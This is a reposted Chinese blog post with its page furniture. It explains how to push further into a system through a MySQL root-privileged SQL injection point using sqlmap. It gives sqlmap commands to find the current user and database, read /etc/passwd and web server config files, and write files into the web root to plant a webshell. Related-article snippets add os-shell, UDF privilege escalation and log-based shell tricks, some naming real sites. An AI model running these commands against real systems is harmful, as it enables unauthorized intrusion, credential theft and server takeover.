sqlmap mysql root_sqlmap注入mysql和到root权限后怎么样深入

最新推荐文章于 2023-04-14 18:36:39 发布
最新推荐文章于 2023-04-14 18:36:39 发布
阅读量148 收藏
点赞数
文章标签: sqlmap mysql root
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33281940/article/details/113216544
版权

碰着一mysql root权限注入点,实验用sqlmap进一步渗透获取更高权限,东亚服务器

台湾服务器,详细如下:

判定注入点的当前用户和当前数据库

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

root权限注入点可以实验读取系统文件,好比/etc/passwd,以及apache,nginx的设置文件等,相关设置文件路径如下:

nginx: usr/local/nginx/conf/nginx.conf

常用的apache设置文件路径有:

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

sqlmap读取文件语法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

假如magic_quotes_gpc=off就可以实验举办写入Webshell,sqlmap写入文件语法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt

将当地的test.txt写入到站点处事器的html目次下。 (责任编辑:梦飞科技)

免责声明:本网站部分文章和信息来源于国际互联网由程序自动整理,本网转载出于传递更多信息和学习之目的,并不意味着赞同其观点或证实其内容的真实性。 如转载稿涉及版权等问题,请立即联系管理员,我们会予以更改或删除相关文章,保证您的权利。对使用本网站信息和服务所引起的后果,我们不作任何承诺。

体制内生存之道
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL提权的两种方式_利用sqlmap进行mysql提权的小方法(win与liunx通用)
weixin_30365269的博客
01-28 1149
文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\wam...
mysql root权限_Mysql root权限下的注入利用技巧( 一 )
weixin_31067223的博客
01-18 330
虽说是root权限,但这并不意味着,你就可以在目标系统中为所欲为,假如目标的root被降了权,或者你想写shell的目标网站目录都不可写,这时,即使你是root权限,能干的事儿也一样非常的有限,当我们在实战中遇到一个mysql root权限注入点时,想干或者暂时能干的事情无非就下面这些,接下来,会针对每种方法做详细演示: 一、查出目标数据库root的密码然后尝试外连,前提是得目标允许root用户...
SQLMap使用教程:从入门到入狱详细指南
qq_61553520的博客
04-14 5646
本文会主要介绍SQLMap的使用,包括常用的参数,常用的语句,以及常用的功能。
sqlmap注入mysql_sqlmapmysql root权限注入
weixin_31282885的博客
01-19 514
遇到一mysql root权限注入点,尝试用sqlmap进一步渗透获取更高权限,具体如下:判断注入点的当前用户和当前数据库./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1"...
sqlmap mysql root权限 执行命令_实例sqlmap进行mysql注入root权限读写文件
weixin_42311115的博客
02-01 805
1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库返回结果 :[02:42:20] [INFO] fetching current user current us...
sqlmap mysql root_实例sqlmap进行mysql注入root权限读写文件
weixin_29058331的博客
01-19 319
实例sqlmap进行mysql注入root权限读写文件(2012-08-02 16:01:33)注解: 1.在BT5 R2下 sqlmap安装路径为root@bt:/pentest/database/sqlmap# 也可以通过启动快捷方式启动sqlmap root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.wepost....
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
Linux利用UDF库实现Mysql提权
09-10
8. **权限管理**:在实际操作中,由于MySQL服务器通常以非root权限运行,因此可能需要调整相关目录的权限,以确保MySQL能够访问和写入UDF库文件。 请注意,这种提权方法具有潜在的安全风险,如果被恶意利用,可能...
sqlmap (懂的入)
08-09
Here is a list of major features implemented in sqlmap: * Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end. Besides these four DBMS, sqlmap ...
SQLMap使用|命令大全(干货)
热门推荐
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap进行mysql注入root权限读写文件
u013473439的专栏
01-14 5853
1.在BT5 R2下root@bt:/sqlmap# python sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 -f -b --current-user --current-db -v 1 /*获取当前用户和当前数据库   返回结果 :   [02:42:20] [INFO] fetching current user cu
文件权限定义S_IRUSR,S_IWUSR,S_IRGRP,S_IWGRP,S_IROTH,S_IWOTH
qq_43751200的博客
09-22 9515
S_IRUSR:用户读权限 S_IWUSR:用户写权限 S_IRGRP:用户组读权限 S_IWGRP:用户组写权限 S_IROTH:其他组都权限 S_IWOTH:其他组写权限
SQLMAP- 自动注入
含笑
05-20 5142
SQLmap是一款用来检测与利用SQL注入漏洞的基于python2.7开发的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 基于布尔的盲注检测 基于时间的盲注检测 ‘and (select * from (select(sleep(20)))a)–+ 基于错误的检测 基于UNION联
mysql root 注入_Mysql root权限下的注入利用技巧( 二 )
weixin_42355570的博客
01-27 160
上一篇,我们详细说明了mysqlroot权限下如何读写文件,开启外连,这次我们就来简单说明如何通过mysql的log功能写shell以及如何利用udf执行系统命令日志写,利用核心利用mysql的general log功能来写shell,其实,核心很简单,当你把这个开关开启以后,它自动把所有执行过的sql语句都记录到一个指定的文件里去,具体怎么利用呢,其实也很简单,由于mysqlroot权限是...
sqlmap提权
m0_51822230的博客
05-17 4301
mysql提权 一.os-shell提权 建立os-shell前提条件: ①必须要有dba权限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户权限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
SQLMAP之高权限用户操作
baynk的博客
03-31 3270
0x00 SQLMAP 这个SQLMAP还是有点东西的,虽然在很多时候没有自己写的小东西好使,但是有些功能确实做的不错,好多东西还没精力去研究,看到了就记一笔。 0x01 检查当前用户 用自己的靶场做的测试。 python sqlmap.py -u "http://www.baynk.com/bvwa/vul/sqli/sqli-union-get-num.php?id=1" --os=wind...
渗透利器-sqlmap超级详解
kracer的博客
11-08 4418
目录 0X01 背景介绍 0X02 原理简述 0X03 参数说明 0X04 实战举例 0X05 高级用法 0X06 总结 0X01 背景介绍 官网:http://sqlmap.org 目前支持的数据库有:Altibase,Apache Derby, CrateDB, Cubrid, Firebird, FrontBase, H2, HSQLDB, IBM DB2, Informix, InterSystems Cache, Mckoi, Microsoft...
win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1009
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
sqlmap从txt文件注入
最新发布
07-29
\[2\]如果你想要执行指定的SQL语句,可以使用--sql-query参数,例如--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"。\[3\]这样可以执行指定的SQL语句并获取相应的结果。 #### 引用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值